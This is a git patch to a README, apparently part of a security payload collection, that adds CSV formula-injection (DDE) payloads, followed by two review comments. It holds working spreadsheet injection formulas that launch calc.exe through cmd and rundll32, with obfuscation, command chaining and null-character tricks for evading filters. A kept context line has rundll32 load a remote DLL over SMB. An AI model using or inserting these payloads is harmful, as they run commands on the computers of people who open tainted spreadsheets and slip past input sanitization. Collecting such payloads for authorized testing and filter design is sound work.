From 126555e5f933e5f8a12a8facd4bd3461529de8b8 Mon Sep 17 00:00:00 2001 From: Tametomo Date: Tue, 16 Mar 2021 19:17:01 -0600 Subject: [PATCH] Update README.md Add additional CSV test cases --- CSV Injection/README.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/CSV Injection/README.md b/CSV Injection/README.md index a6f54e5..6c1236f 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -20,6 +20,20 @@ DDE ("cmd";"/C calc";"!A0")A0 # msf smb delivery with rundll32 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 + +# Prefix obfuscation and command chaining +=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A +=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A ++thespanishinquisition(cmd|'/c calc.exe'!A += cmd|'/c calc.exe'!A + +# Using rundll32 instead of cmd +=rundll32|'URL.dll,OpenURL calc.exe'!A +=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A + +# Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. += C m D | '/ c c al c . e x e ' ! A + ``` Technical Details of the above payload: @@ -46,3 +60,4 @@ Any formula can be started with * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) * [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) +* [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation)
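Review bot: The null-character payload in the first hunk is not reproducible as committed: the added line reads `= C m D | '/ c c al c . e x e ' ! A` with ordinary spaces, so anyone copying it from the rendered README gets spaces, which the comment on the line above says are exactly what the technique does not use. Write the line in an escaped form (for example with `\x00` markers) or state explicitly that the plain-text line is illustrative only and the real bytes are NUL, and name the kind of filter the comment has in mind ("dictionary filters") in one sentence, so the defensive takeaway that follows from it, stripping or normalizing control characters before inspecting the leading character of a cell, is clear to the reader.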
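Review bot: The new reference entry in the second hunk is missing the date and author that every other entry in the list carries (`- 5th November 2015 - Adam Chester`, `- 7 October, 2017 - George Mauer`); add them in the same `Title - date - author` form so the list stays consistent, and since this link is the source for the new "Prefix obfuscation" and "Using rundll32" sections, a short pointer to it in those comments would make the provenance of the new test cases traceable.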